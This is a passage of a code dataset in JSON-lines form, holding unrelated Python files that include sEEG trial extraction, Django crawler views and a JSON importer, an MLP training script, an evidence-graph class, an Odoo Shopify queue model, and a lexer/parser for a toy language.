parser.parse_args()\n\n # initialize the config parser\n if not os.path.exists(args.config):\n print('WARNING: File path to the config file is invalid. Please specify a proper path. Script will exit!')\n exit(1)\n config = configparser.ConfigParser()\n config.read(args.config)\n\n # initialize logging handler\n log_file = '.'.join(['train', 'log'])\n log_file = os.path.join(config['General']['storage_dir'], config['General']['session'], log_file)\n logging.basicConfig(\n level=logging.INFO,\n format='[%(asctime)s] [%(name)-30s] [%(levelname)8s]: %(message)s',\n datefmt='%d.%m.%y %H:%M:%S',\n handlers=[logging.StreamHandler(sys.stdout)])\n\n logging.getLogger('data_loader.py').setLevel(logging.WARNING)\n\n session_dir = os.path.join(config['General']['storage_dir'], config['General']['session'])\n decoding_runs = [os.path.join(session_dir, run_dir) for run_dir in os.listdir(session_dir)\n if os.path.isdir(os.path.join(session_dir, run_dir))]\n temp_dir = os.path.join(config['General']['temp_dir'], config['General']['session'])\n os.makedirs(temp_dir, exist_ok=True)\n\n logger.info('Processing training data'.format(os.path.basename(config['General']['session'])))\n\n # Extract wavs from training session\n extract_wavs_from_session(session_dir=session_dir, temp_dir=temp_dir)\n\n # Extract trials from decoding runs\n for run_dir in decoding_runs:\n try:\n logger.info('Processing wavs of {}'.format(os.path.basename(run_dir)))\n\n # Extract wavs\n extract_wavs_from_decoding_trials(run_dir=run_dir, temp_dir=temp_dir)\n\n # Generate .lab file\n generate_trial_label_file(run_dir=run_dir, temp_dir=temp_dir)\n\n except Exception as e:\n logger.warning('Skipping {} due to a caused exception: {}'.format(run_dir, str(e)))\n","repo_name":"cognitive-systems-lab/closed-loop-seeg-speech-synthesis","sub_path":"eval_steps/extract_trials.py","file_name":"extract_trials.py","file_ext":"py","file_size_in_byte":3553,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"63"} +{"seq_id":"30345412748","text":"from .crawler_manager import CrawlerManager\nfrom rest_framework.decorators import permission_classes, api_view\nfrom rest_framework.permissions import AllowAny\nfrom rest_framework.response import Response\nimport json\n\nmanager = CrawlerManager(0)\n\n\n@api_view(['POST'])\n@permission_classes((AllowAny, ))\ndef run_crawler(request):\n data = request.data\n crawler_name = data['crawler_name']\n overlap_chk = data['overlap_chk']\n print(\"in run_crawler\" + str(data))\n result = manager.run_crawler(crawler_name, overlap_chk)\n\n return Response(result)\n\n\n@api_view(['POST'])\n@permission_classes((AllowAny, ))\ndef post_category(request):\n result = {'status': False}\n category = request.data['category']\n if category == 'category':\n result = {'category': manager.send_category_dic_and_info()}\n elif category == 'sub_category':\n result = {'sub_category': manager.send_sub_category_dic_and_info()}\n elif category == 'category_size_part':\n result = {'category_size_part': manager.send_category_size_part_dic_and_info()}\n elif category == 'sub_category_size_part':\n result = {'sub_category_size_part': manager.send_sub_category_size_part_dic_and_info()}\n\n return Response(result)\n\n\n@api_view(['POST'])\n@permission_classes((AllowAny, ))\ndef post_category_dic_and_info(request):\n \"\"\"\n :param request: 위 method 에서 전달한 list 를 바탕으로 사용자가 mapping 을 하게 되면, 선택한 정보를 받아와 직접 DB에 반영하는 method\n category: 어떠한 category(cate, sub_cate, cate_size_part 등...) 정보에 대해서 mapping 을 할 것인지\n info: dic 에 update 할 info 정보 (querySet 형태가 아닌 model 자체 정보가 넘와야 할듯 > 해당 info_pk 로 수정)\n dic: update 대상인 dic 의 정보 (querySet 형태가 아닌 model 자체 정보가 넘와야 할듯 > 해당 dic_pk 로 수정)\n :return:\n \"\"\"\n result = {'status': False}\n try:\n category = request.data['category']\n info_pk = request.data['info_pk']\n dic_pk = request.data['dic_pk']\n except Exception:\n return Response(result)\n\n if category == 'category':\n result = manager.receive_category_dic_info(dic_pk, info_pk)\n elif category == 'sub_category':\n result = manager.receive_sub_category_dic_info(dic_pk, info_pk)\n elif category == 'category_size_part':\n result = manager.receive_category_size_part_dic_info(dic_pk, info_pk)\n elif category == 'sub_category_size_part':\n result = manager.receive_sub_category_size_part_dic_info(dic_pk, info_pk)\n\n return Response(result)\n\n'''\n{\n \"category_dic_id\": 30,\n \"category_similar\": \"INNER WEAR\",\n \"category_info_id\": null\n}\n{\n \"category_info_id\": 17,\n \"category_name\": \"레그웨어/속옷\"\n}\n\n'''","repo_name":"hyungi/sizecom_crawler_module","sub_path":"crawler/crawler_view.py","file_name":"crawler_view.py","file_ext":"py","file_size_in_byte":2808,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"20010185270","text":"import json\nimport os\nfrom django.core.management.base import BaseCommand\nfrom django.conf import settings\nfrom Preference.models import DataEntry\nfrom datetime import datetime\n\nclass Command(BaseCommand):\n help = 'Import data from JSON file'\n\n def handle(self, *args, **options):\n json_file_path = os.path.join(settings.BASE_DIR, 'jsondata.json')\n\n try:\n with open(json_file_path, 'r', encoding='utf-8') as json_file:\n data = json.load(json_file)\n\n for item in data:\n # Handle the intensity field\n try:\n intensity = float(item.get('intensity', 0))\n except (ValueError, TypeError):\n self.stdout.write(self.style.WARNING(f\"Invalid intensity value: {item.get('intensity')}\"))\n intensity = 0 # Set to a default value\n\n # Handle empty or missing added field\n added_str = item.get('added', '')\n if added_str:\n try:\n added = datetime.strptime(added_str, \"%B, %d %Y %H:%M:%S\")\n except ValueError:\n self.stdout.write(self.style.WARNING(f\"Invalid date/time format: {added_str}\"))\n added = None\n else:\n added = None\n\n # Handle empty or missing published field\n published_str = item.get('published', '')\n if published_str:\n try:\n published = datetime.strptime(published_str, \"%B, %d %Y %H:%M:%S\")\n except ValueError:\n self.stdout.write(self.style.WARNING(f\"Invalid date/time format: {published_str}\"))\n published = None\n else:\n published = None\n\n # Handle the likelihood field\n likelihood = item.get('likelihood', None)\n if likelihood == '':\n likelihood = None\n else:\n try:\n likelihood = int(likelihood)\n except (ValueError, TypeError):\n self.stdout.write(self.style.WARNING(f\"Invalid likelihood value: {likelihood}\"))\n likelihood = None\n\n DataEntry.objects.create(\n end_year=item['end_year'],\n intensity=intensity,\n sector=item['sector'],\n topic=item['topic'],\n insight=item['insight'],\n url=item['url'],\n region=item['region'],\n start_year=item['start_year'],\n impact=item['impact'],\n added=added,\n published=published,\n country=item['country'],\n relevance=item['relevance'],\n pestle=item['pestle'],\n source=item['source'],\n title=item['title'],\n likelihood=likelihood,\n )\n\n self.stdout.write(self.style.SUCCESS('Data imported successfully!'))\n except FileNotFoundError:\n self.stdout.write(self.style.ERROR(f'File not found: {json_file_path}'))\n","repo_name":"amalmathew21/BlackCoffer","sub_path":"Preference/management/commands/import_data.py","file_name":"import_data.py","file_ext":"py","file_size_in_byte":3564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"1556007866","text":"import numpy as np \nimport pandas as pd \n\nfrom sklearn.preprocessing import MinMaxScaler, scale, StandardScaler\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.utils import shuffle\nfrom sklearn.metrics import f1_score\n\npath = '../../project1/data/'\ntrain = pd.read_csv(path + 'train_all2.csv')\ntest = pd.read_csv(path + 'test_all2.csv')\n# features = ['overlap_title', 'temp_diff', 'comm_auth', 'ada_ada_ind', 'reduced_tfidf_sim', 'comm_neighbors', 'in_diff', ']\n#features = ['sim', 'year_diff', 'common_authors', 'cn', 'aai', 'title_overlap']\n# X_train = train.drop(['id1', 'id2', 'jaccard_coeff', 'labels', 'ada_ada_ind', 'comm_auth', 'comm_neigh_s', 'title_sim'], axis=1).values\n# y_train = train['labels']\n# X_test = test.drop(['id1', 'id2', 'jaccard_coeff', 'comm_auth', 'ada_ada_ind', 'comm_neigh_s', 'title_sim'], axis=1).values\nX_train = train.drop(['id1', 'id2', 'link', 'rno1', 'rno2', 'pa'], axis=1).values\ny_train = train['link']\nX_test = test.drop(['id1', 'id2', 'rno1', 'rno2', 'pa'], axis=1).values\n\n\nscaler = StandardScaler()\nX_train = scaler.fit_transform(X_train)\nX_test = scaler.transform(X_test)\n# X_train = scale(X_train)\n# X_test = scale(X_test)\nX_train, y_train = shuffle(X_train, y_train, random_state=0)\n\nalphas = [1e-6, 1e-5, 1e-4, 1e-3, 1e-2, 1e-1]\nfor alpha in alphas:\n clf = MLPClassifier(hidden_layer_sizes=(30, 15, 5), \n alpha=alpha, \n max_iter=200, \n tol=1e-7,\n verbose=False)\n # print ('cv', cross_val_score(clf, \n # X_train, \n # y_train, \n # cv=5, \n # scoring='f1', \n # n_jobs=-1).mean())\n clf.fit(X_train, y_train)\n\n train_pred = clf.predict(X_train)\n print (\"training set f1 score is\", f1_score(y_train, train_pred, average='micro'))\n\n# test_pred = clf.predict(X_test)\n# preds = pd.DataFrame()\n# preds['id'] = range(len(test))\n# preds['category'] = test_pred\n# preds.to_csv(path+'../result/preds_nn_all.csv', index=False)\n# print ('prediction saved')\n","repo_name":"SWKG21/Porto_Seguro_Safe_Driver_Prediction","sub_path":"notebooks/models/nn_all.py","file_name":"nn_all.py","file_ext":"py","file_size_in_byte":2210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"11874360973","text":"\"\"\"\n@author: Andreas Peldszus\n\"\"\"\n\n\nimport networkx as nx\n\n\nclass EvidenceGraph(nx.MultiDiGraph):\n \"\"\"\n A (potentially fully connected) MultiDiGraph, where every edge has a vector\n of scores. From this vector of scores, a weighted sum can be calculated to\n assign a single weight to every edge in a newly formed WeightedEvidenceGraph.\n \"\"\"\n\n def __init__(\n self, data=None, main_weight_id=\"weight\", weight_ids=None, **attr\n ):\n \"\"\"\n Constructs a new EvidenceGraph.\n `main_weight_id` is the name of the final total weight.\n `weight_ids` is an iterable with the ids of the different weights.\n\n >>> eg = EvidenceGraph(weight_ids=['cc', 'ro', 'fu', 'at'])\n >>> eg.main_weight_id == \"weight\"\n True\n >>> eg.weight_ids == ['cc', 'ro', 'fu', 'at']\n True\n \"\"\"\n self.main_weight_id = main_weight_id\n self.weight_ids = weight_ids if weight_ids is not None else list()\n super().__init__(data, **attr)\n\n def get_weighted_evidence_graph(self, weights=None):\n \"\"\"\n Returns an isomorph WeightedEvidenceGraph, where every edge has\n as a single score the weighted sum of the various weights assigned\n in the evidence graph.\n\n >>> eg = EvidenceGraph(weight_ids=['cc', 'ro', 'fu', 'at'])\n >>> eg.add_edge(1, 2, type=\"rel_a\", cc=0.1, ro=0.9, fu=0.1, at=0.9)\n >>> eg.add_edge(1, 2, type=\"rel_b\", cc=0.9, ro=0.1, fu=0.9, at=0.1)\n >>> weg = eg.get_weighted_evidence_graph()\n >>> weg.edges(data=True)\n [(1, 2, {'type': 'rel_a', 'weight': 0.5}),\n (1, 2, {'type': 'rel_b', 'weight': 0.5})]\n >>> weg = eg.get_weighted_evidence_graph(weights={'cc': 0.5, 'ro': 0.3, 'fu': 0.2, 'at': 0.0})\n >>> weg.edges(data=True)\n [(1, 2, {'type': 'rel_a', 'weight': 0.34}),\n (1, 2, {'type': 'rel_b', 'weight': 0.66})]\n \"\"\"\n # copy the graph structure\n g = WeightedEvidenceGraph(main_weight_id=self.main_weight_id)\n g.graph = self.graph\n g.add_nodes_from(self.nodes(data=True))\n # default to equally weighted weights\n if weights is None:\n weights = {x: 1.0 for x in self.weight_ids}\n # add the used weighting to the graph data\n g.graph[\"weighting\"] = weights\n # calculate the weighted sum for all weights\n for s, t, k, d in self.edges(keys=True, data=True):\n # keep all the dict entries but the weight_ids\n new_d = {u: v for u, v in d.items() if u not in self.weight_ids}\n # calc weight\n new_d[self.main_weight_id] = self._normalized_weighted_sum(\n d, weights\n )\n g.add_edge(s, t, key=k, attr_dict=new_d)\n return g\n\n def _normalized_weighted_sum(self, d, weights):\n sum_of_weights = 0.0\n sum_of_weighted_weights = 0.0\n for weight_id, weight in weights.items():\n if weight_id not in self.weight_ids or weight_id not in d:\n print(\n (\n \"Warning: '%s' is not a registered weight id. \"\n \"skipping.\"\n )\n % weight_id\n )\n continue\n else:\n w = d[weight_id]\n ww = weight\n sum_of_weights += ww\n sum_of_weighted_weights += w * ww\n return sum_of_weighted_weights / sum_of_weights\n\n\nclass WeightedEvidenceGraph(nx.MultiDiGraph):\n def __init__(self, data=None, main_weight_id=\"weight\", **attr):\n self.main_weight_id = main_weight_id\n super().__init__(data, **attr)\n","repo_name":"peldszus/evidencegraph","sub_path":"src/evidencegraph/evidence_graph.py","file_name":"evidence_graph.py","file_ext":"py","file_size_in_byte":3688,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"63"} +{"seq_id":"74774828679","text":"import json\nimport logging\n\nfrom odoo import models, fields\nfrom .. import shopify\n\n_logger = logging.getLogger(\"Shopify\")\n\n\nclass ShopifyProductDataQueueLineEpt(models.Model):\n _name = \"shopify.product.data.queue.line.ept\"\n _description = \"Shopify Product Data Queue Line\"\n\n shopify_instance_id = fields.Many2one(\"shopify.instance.ept\", string=\"Instance\")\n last_process_date = fields.Datetime()\n synced_product_data = fields.Text()\n product_data_id = fields.Char()\n state = fields.Selection([(\"draft\", \"Draft\"), (\"failed\", \"Failed\"), (\"done\", \"Done\"),\n (\"cancel\", \"Cancelled\")],\n default=\"draft\")\n product_data_queue_id = fields.Many2one(\"shopify.product.data.queue.ept\", required=True,\n ondelete=\"cascade\", copy=False)\n common_log_lines_ids = fields.One2many(\"common.log.lines.ept\",\n \"shopify_product_data_queue_line_id\",\n help=\"Log lines created against which line.\")\n name = fields.Char(string=\"Product\", help=\"It contain the name of product\")\n\n def auto_import_product_queue_line_data(self):\n \"\"\"\n This method used to process synced shopify product data in batch of 100 queue lines.\n @author: Maulik Barad on Date 31-Aug-2020.\n \"\"\"\n product_data_queue_obj = self.env[\"shopify.product.data.queue.ept\"]\n ir_model_obj = self.env[\"ir.model\"]\n common_log_book_obj = self.env[\"common.log.book.ept\"]\n\n query = \"\"\"select queue.id\n from shopify_product_data_queue_line_ept as queue_line\n inner join shopify_product_data_queue_ept as queue on queue_line.product_data_queue_id = queue.id\n where queue_line.state='draft' and queue.is_action_require = 'False'\n ORDER BY queue_line.create_date ASC limit 1\"\"\"\n self._cr.execute(query)\n product_data_queue_id = self._cr.fetchone()\n if not product_data_queue_id:\n return\n\n queue = product_data_queue_obj.browse(product_data_queue_id)\n product_data_queue_line_ids = queue.product_data_queue_lines\n\n # For counting the queue crashes and creating schedule activity for the queue.\n queue.queue_process_count += 1\n if queue.queue_process_count > 3:\n queue.is_action_require = True\n note = \"

Need to process this product queue manually.There are 3 attempts been made by \" \\\n \"automated action to process this queue,
- Ignore, if this queue is already processed.

\"\n queue.message_post(body=note)\n if queue.shopify_instance_id.is_shopify_create_schedule:\n model_id = ir_model_obj.search([(\"model\", \"=\", \"shopify.product.data.queue.ept\")]).id\n common_log_book_obj.create_crash_queue_schedule_activity(queue, model_id, note)\n return\n\n self._cr.commit()\n product_data_queue_line_ids.process_product_queue_line_data()\n return\n\n def process_product_queue_line_data(self):\n \"\"\"\n This method processes product queue lines.\n @author: Maulik Barad on Date 31-Aug-2020.\n \"\"\"\n shopify_product_template_obj = self.env[\"shopify.product.template.ept\"]\n common_log_book_obj = self.env[\"common.log.book.ept\"]\n model_id = common_log_book_obj.log_lines.get_model_id(\"shopify.product.template.ept\")\n\n queue_id = self.product_data_queue_id if len(self.product_data_queue_id) == 1 else False\n\n if queue_id:\n shopify_instance = queue_id.shopify_instance_id\n if not shopify_instance.active:\n _logger.info(\"Instance '{}' is not active.\".format(shopify_instance.name))\n return True\n if queue_id.common_log_book_id:\n log_book_id = queue_id.common_log_book_id\n else:\n log_book_id = common_log_book_obj.create({\"type\": \"import\",\n \"module\": \"shopify_ept\",\n \"shopify_instance_id\": shopify_instance.id,\n \"model_id\": model_id,\n \"active\": True})\n self.env.cr.execute(\n \"\"\"update shopify_product_data_queue_ept set is_process_queue = False where is_process_queue = True\"\"\")\n self._cr.commit()\n commit_count = 0\n for product_queue_line in self:\n commit_count += 1\n if commit_count == 10:\n queue_id.is_process_queue = True\n self._cr.commit()\n commit_count = 0\n # Loop on Products\n shopify_product_template_obj.shopify_sync_products(product_queue_line,\n False,\n shopify_instance,\n log_book_id)\n queue_id.is_process_queue = False\n queue_id.common_log_book_id = log_book_id\n if queue_id.common_log_book_id and not queue_id.common_log_book_id.log_lines:\n queue_id.common_log_book_id.unlink()\n return True\n\n def replace_product_response(self):\n \"\"\"\n This method used to replace the product data response in the failed queue line. It will\n call from the product queue line button.\n @author: Haresh Mori @Emipro Technologies Pvt.Ltd on date 21/1/2020.\n \"\"\"\n instance = self.shopify_instance_id\n if not instance.active:\n _logger.info(\"Instance '{}' is not active.\".format(instance.name))\n return True\n instance.connect_in_shopify()\n if not self.product_data_id:\n return True\n result = shopify.Product().find(self.product_data_id)\n result = result.to_dict()\n data = json.dumps(result)\n self.write({\"synced_product_data\": data, \"state\": \"draft\"})\n self._cr.commit()\n self.process_product_queue_line_data()\n return True\n","repo_name":"confclub/odoo","sub_path":"shopify_ept/models/product_data_queue_line.py","file_name":"product_data_queue_line.py","file_ext":"py","file_size_in_byte":6315,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"28982860657","text":"from typing import List\n\n\ntokensTable = []\nclass Lexer:\n def __init__(self, transition_table, accepting_states):\n self.transition_table = transition_table\n self.accepting_states = accepting_states\n self.current_state = 0\n self.current_token = ''\n self.tokenTable = [['','']] # define tokenTable attribute here\n\n def currentToken(self, token, state, tokenTable):\n if state == 58:\n tokenTable.append(['VariableDecl', 'LET'])\n return tokenTable\n\n if state == 60:\n #print(tokenTable[-1][0])\n if tokenTable[-1][0] == 'Variable':\n tokenTable[-1][1] += token\n return tokenTable\n else:\n tokenTable.append(['Variable', token])\n return tokenTable\n\n if state == 1 or state == 102:\n if tokenTable[-1][0] == 'ExpVariable':\n tokenTable[-1][1] += token\n return tokenTable\n else:\n tokenTable.append(['ExpVariable', token])\n return tokenTable\n\n if state == 37:\n if tokenTable[-1][0] == 'Integer':\n tokenTable[-1][1] += token\n return tokenTable\n else:\n tokenTable.append(['Integer', token])\n return tokenTable\n\n if state == 2 or state == 8 or state == 4 or state == 5 or state == 6 or state == 7:\n if tokenTable[-1][0] == 'BinaryOp':\n tokenTable[-1][1] += token\n return tokenTable\n else:\n tokenTable.append(['BinaryOp', token])\n return tokenTable\n\n\n\n if state == 39 or state == 40 or state == 41 or state == 42 or state == 43 or state == 44 or state == 45:\n if tokenTable[-1][0] == 'ColourLiteral':\n tokenTable[-1][1] += token\n return tokenTable\n else:\n tokenTable.append(['ColourLiteral', token])\n return tokenTable\n\n if state == 19:\n tokenTable.append(['PadWidth', '__width'])\n return tokenTable\n\n if state == 25:\n tokenTable.append(['PadHeight', '__height'])\n return tokenTable\n\n if state == 49:\n tokenTable.append(['BooleanLiteral', 'True'])\n return tokenTable\n\n if state == 54:\n tokenTable.append(['BooleanLiteral', 'False'])\n return tokenTable\n\n if state == 30:\n tokenTable.append(['PadRandI', '__randi'])\n return tokenTable\n\n if state == 140:\n tokenTable.append(['PadRead', '__read'])\n return tokenTable\n\n if state == 138:\n tokenTable.append(['Comma', ' , '])\n return tokenTable\n\n if token == '(':\n tokenTable.append(['OpenPar', ' ( '])\n return tokenTable\n\n if token == ')':\n tokenTable.append(['ClosePar', ' ) '])\n return tokenTable\n\n if token == '{':\n tokenTable.append(['OpenBlock', ' { '])\n return tokenTable\n\n if token == '}':\n tokenTable.append(['CloseBlock', ' } '])\n return tokenTable\n\n if state == 12:\n tokenTable.append(['Unary', 'Not'])\n return tokenTable\n\n if state == 11:\n tokenTable.append(['Unary', token])\n return tokenTable\n\n if state == 87:\n tokenTable.append(['PrintStat', '__print'])\n return tokenTable\n\n if state == 92:\n tokenTable.append(['DelayStat', '__delay'])\n return tokenTable\n\n if state == 97:\n tokenTable.append(['ReturnStat', 'return'])\n return tokenTable\n\n if state == 136:\n tokenTable.append(['PixelStat', '__pixel'])\n return tokenTable\n\n if state == 137 :\n if tokenTable[-1][0] == 'PixelStat':\n tokenTable[-1][1] += token\n return tokenTable\n else:\n tokenTable.append(['PixelStat', token])\n return tokenTable\n\n if state == 125:\n tokenTable.append(['IfStat', ' IF'])\n return tokenTable\n\n if state == 132:\n tokenTable.append(['ElseStat', ' ELSE '])\n return tokenTable\n\n if state == 111:\n tokenTable.append(['ForStat', ' FOR '])\n return tokenTable\n\n if state == 121:\n tokenTable.append(['WhileStat', ' While '])\n return tokenTable\n\n if token == ';':\n tokenTable.append(['SemiCol', ' ; '])\n return tokenTable\n\n if token == ',':\n tokenTable.append(['Comma', ' , '])\n return tokenTable\n\n if state == 100:\n tokenTable.append(['FunctionDecl', ' FUN '])\n return tokenTable\n\n if state == 68:\n tokenTable.append(['Type', ' FLOAT '])\n return tokenTable\n\n if state == 71:\n tokenTable.append(['Type', ' INT '])\n return tokenTable\n\n if state == 74:\n tokenTable.append(['Type', ' BOOL '])\n return tokenTable\n\n if state == 79:\n tokenTable.append(['Type', ' COLOUR '])\n return tokenTable\n return tokenTable\n\n def get_next_token(self, input_string):\n self.current_state = 0\n self.current_token = ''\n self.table = []\n for char in input_string:\n try:\n self.current_state = self.transition_table[(self.current_state, char)]\n self.current_token += char\n self.table.append((char, self.current_state))\n\n #print(f\"Current token: {self.current_token}, current state: {self.current_state}\")\n\n self.tokenTable = self.currentToken(char, self.current_state, self.tokenTable) # pass tokenTable as argument\n\n\n except KeyError:\n return False, self.current_token, self.current_state, self.table\n\n #print(self.tokenTable)\n\n if self.current_state in self.accepting_states:\n print(f\"Valid syntax! Current token: {input_string}, current state: {self.current_state}\")\n\n\n return self.tokenTable\n else:\n print(f\"Invalid syntax! Current token: {input_string}, current state: {self.current_state}\")\n #return False, self.current_token, self.current_state, self.table\n\n\n\nclass Parser:\n #def __init__(self, lexer, input_string):\n def __init__(self, tokenTable):\n self.lexer = lexer\n #self.tokenTable = self.lexer.get_next_token(input_string)\n self.tokenTable = tokenTable\n self.current_token_index = 1\n\n\n def error(self, message):\n raise Exception(message)\n\n def parse_selector(self):\n if self.tokenTable[self.current_token_index][0] == 'FunctionDecl':\n return (self.parse_function_decl())\n\n if self.tokenTable[self.current_token_index][0] == 'VariableDecl':\n return(self.parse_variable_decl())\n\n if self.tokenTable[self.current_token_index][0] == 'Variable':\n return(self.parse_variable())\n\n if self.tokenTable[self.current_token_index][0] == 'PrintStat':\n return(self.parse_print())\n\n if self.tokenTable[self.current_token_index][0] == 'DelayStat':\n return(self.parse_delay())\n\n if self.tokenTable[self.current_token_index][0] == 'ReturnStat':\n return(self.parse_return())\n\n if self.tokenTable[self.current_token_index][0] == 'PixelStat':\n return(self.parse_pixel())\n\n if self.tokenTable[self.current_token_index][0] == 'OpenBlock':\n return(self.parse_block())\n\n if self.tokenTable[self.current_token_index][0] == 'WhileStat':\n return(self.parse_while())\n\n if self.tokenTable[self.current_token_index][0] == 'IfStat':\n return(self.parse_ifElse())\n\n\n if self.tokenTable[self.current_token_index][0] == 'ForStat':\n return (self.parse_for())\n\n return {'No choice'}\n\n def parse_sel(self):\n ast = []\n while(self.current_token_index < len(self.tokenTable)-1):\n\n if self.tokenTable[self.current_token_index][0] == 'FunctionDecl':\n ast.append(self.parse_function_decl())\n\n elif self.tokenTable[self.current_token_index][0] == 'VariableDecl':\n ast.append(self.parse_variable_decl())\n\n elif self.tokenTable[self.current_token_index][0] == 'Variable':\n ast.append(self.parse_variable())\n\n elif self.tokenTable[self.current_token_index][0] == 'PrintStat':\n ast.append(self.parse_print())\n\n elif self.tokenTable[self.current_token_index][0] == 'DelayStat':\n ast.append(self.parse_delay())\n\n elif self.tokenTable[self.current_token_index][0] == 'ReturnStat':\n ast.append(self.parse_return())\n\n elif self.tokenTable[self.current_token_index][0] == 'PixelStat':\n ast.append(self.parse_pixel())\n\n elif self.tokenTable[self.current_token_index][0] == 'OpenBlock':\n ast.append(self.parse_block())\n\n elif self.tokenTable[self.current_token_index][0] == 'WhileStat':\n ast.append(self.parse_while())\n\n elif self.tokenTable[self.current_token_index][0] == 'IfStat':\n ast.append(self.parse_ifElse())\n\n elif self.tokenTable[self.current_token_index][0] == 'ForStat':\n ast.append(self.parse_for())\n\n else:\n ast.append({'No choice'})\n\n\n return(ast)\n\n\n #might need to remove useless\n def get_current_token(self):\n return self.tokenTable[self.current_token_index]\n\n def parse_function_decl(self):\n # Expect the next token to be FunctionDecl\n\n if self.tokenTable[self.current_token_index][0] != 'FunctionDecl':\n self.error('Expected FunctionDecl')\n self.current_token_index += 1\n\n # Expect the next token to be the function name\n if self.tokenTable[self.current_token_index][0] != 'ExpVariable':\n self.error('Expected function name')\n func_name = self.tokenTable[self.current_token_index][1]\n self.current_token_index += 1\n\n # Expect the next token to be OpenPar\n if self.tokenTable[self.current_token_index][0] != 'OpenPar':\n self.error('Expected (')\n self.current_token_index += 1\n\n # Parse the function parameters\n params = []\n while True:\n if self.tokenTable[self.current_token_index][0] == 'ClosePar':\n break\n\n if self.tokenTable[self.current_token_index][0] != 'Variable':\n self.error('Expected variable name')\n\n param_name = self.tokenTable[self.current_token_index][1]\n self.current_token_index += 1\n if self.tokenTable[self.current_token_index][0] != 'Type':\n self.error('Expected parameter type')\n\n param_type = self.tokenTable[self.current_token_index][1]\n params.append((param_name, param_type))\n self.current_token_index += 1\n if self.tokenTable[self.current_token_index][0] != 'Comma' and self.tokenTable[self.current_token_index][\n 0] != 'ClosePar':\n self.error('Expected , or )')\n\n if self.tokenTable[self.current_token_index][0] == 'Comma':\n self.current_token_index += 1\n\n\n self.current_token_index += 1\n return_type = self.tokenTable[self.current_token_index][1]\n if self.tokenTable[self.current_token_index][0] != 'Type':\n self.error('Expected parameter type')\n\n #self.current_token_index += 1\n # Expect the next token to be OpenBrace\n # if self.tokenTable[self.current_token_index][0] != 'OpenBlock':\n # self.error('Expected {')\n\n self.current_token_index += 1\n block = self.parse_block()\n\n #print('func decl', self.tokenTable[self.current_token_index][0])\n # Construct and return the FunctionDecl AST node\n\n info = {'Function name': func_name, 'params': params, 'Return type': return_type, 'Block': block}\n #print('/*-/*-/*-/*-/*-/*-/*/*-/*-/*-/*-',self.current_token_index)\n return {'Function_Decl': info}\n\n def parse_variable_decl(self):\n # Expect the next token to be VariableDecl\n if self.tokenTable[self.current_token_index][0] != 'VariableDecl':\n self.error('Expected VariableDecl')\n self.current_token_index += 1\n\n # Expect the next token to be Variable\n if self.tokenTable[self.current_token_index][0] != 'Variable':\n self.error('Expected variable name')\n var_name = self.tokenTable[self.current_token_index][1]\n self.current_token_index += 1\n\n\n # Expect the next token to be Type\n if self.tokenTable[self.current_token_index][0] != 'Type':\n self.error('Expected type')\n var_type = self.tokenTable[self.current_token_index][1]\n self.current_token_index += 1\n\n # Parse the expression\n expr = self.parse_expr()\n\n #self.current_token_index += 1\n # Expect the next token to be SemiColon\n if self.tokenTable[self.current_token_index][0] != 'SemiCol':\n self.error('Expected ;')\n self.current_token_index += 1\n\n #print('varibake decl', self.tokenTable[self.current_token_index][0])\n \n\n info ={'name': var_name, 'type': var_type, 'expr': expr}\n return {'Variable_Decl': info}\n\n def parse_expr(self):\n\n left = self.parse_simple_expr()\n\n #self.current_token_index += 1\n\n if self.tokenTable[self.current_token_index][1] == '<' or \\\n self.tokenTable[self.current_token_index][1] == '>' or \\\n self.tokenTable[self.current_token_index][1] == '==' or \\\n self.tokenTable[self.current_token_index][1] == '!=' or \\\n self.tokenTable[self.current_token_index][1] == '<=' or \\\n self.tokenTable[self.current_token_index][1] == '>=':\n\n\n\n op = self.tokenTable[self.current_token_index][1]\n\n self.current_token_index += 1\n right = self.parse_simple_expr()\n\n #print('expr', self.tokenTable[self.current_token_index][0])\n return {'Expression Op': op, 'Left Side': left, 'Right Side': right}\n\n else:\n #print('expr', self.tokenTable[self.current_token_index][0])\n return left\n\n def parse_simple_expr(self):\n\n left = self.parse_term()\n #self.current_token_index += 1\n\n if self.tokenTable[self.current_token_index][1] == '+' or\\\n self.tokenTable[self.current_token_index][1] == '-' or \\\n self.tokenTable[self.current_token_index][1] == 'or':\n\n op = self.tokenTable[self.current_token_index][1]\n\n self.current_token_index += 1\n right = self.parse_term()\n #self.current_token_index += 1\n #print('simple expr', self.tokenTable[self.current_token_index][0])\n return {'Expression Op': op, 'Left Side': left, 'Right Side': right}\n\n else:\n #print('simple expr', self.tokenTable[self.current_token_index][0])\n return left\n\n def parse_term(self):\n\n left = self.parse_factor()\n\n #self.current_token_index += 1\n\n if self.tokenTable[self.current_token_index][1] == '*' or \\\n self.tokenTable[self.current_token_index][1] == '/' or \\\n self.tokenTable[self.current_token_index][1] == 'and':\n op = self.tokenTable[self.current_token_index][1]\n\n self.current_token_index += 1\n right = self.parse_factor()\n #self.current_token_index += 1\n #print('term', self.tokenTable[self.current_token_index][0])\n return {'Expression Op': op, 'Left Side': left, 'Right Side': right}\n\n else:\n #print('term', self.tokenTable[self.current_token_index][0])\n return left\n\n def parse_factor(self):\n expTable = []\n\n\n if self.tokenTable[self.current_token_index][0] == 'ExpVariable':\n var_name = self.tokenTable[self.current_token_index][1]\n self.current_token_index += 1\n\n if self.tokenTable[self.current_token_index][0] == 'OpenPar':\n #function call\n self.current_token_index += 1\n exp = self.parse_expr()\n expTable.append(exp)\n while(self.tokenTable[self.current_token_index][0] == 'Comma'):\n self.current_token_index += 1\n exp = self.parse_expr()\n expTable.append(exp)\n\n self.current_token_index += 1\n #print('factor', self.tokenTable[self.current_token_index][0])\n return{'FunctionName': var_name, 'Parameters': expTable}\n #print('factor', self.tokenTable[self.current_token_index][0])\n return {'ExpVariable': var_name}\n\n if self.tokenTable[self.current_token_index][0] == 'Integer':\n token = self.tokenTable[self.current_token_index][1]\n self.current_token_index += 1\n #print('factor', 